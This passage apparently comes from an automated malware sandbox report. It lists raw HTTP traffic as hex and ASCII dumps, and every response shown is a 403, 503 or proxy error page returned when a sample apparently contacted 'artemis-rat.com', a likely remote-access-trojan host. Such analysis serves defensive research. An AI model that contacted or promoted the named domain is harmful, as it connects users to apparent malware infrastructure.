                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:50 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:52 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:52 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:53 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 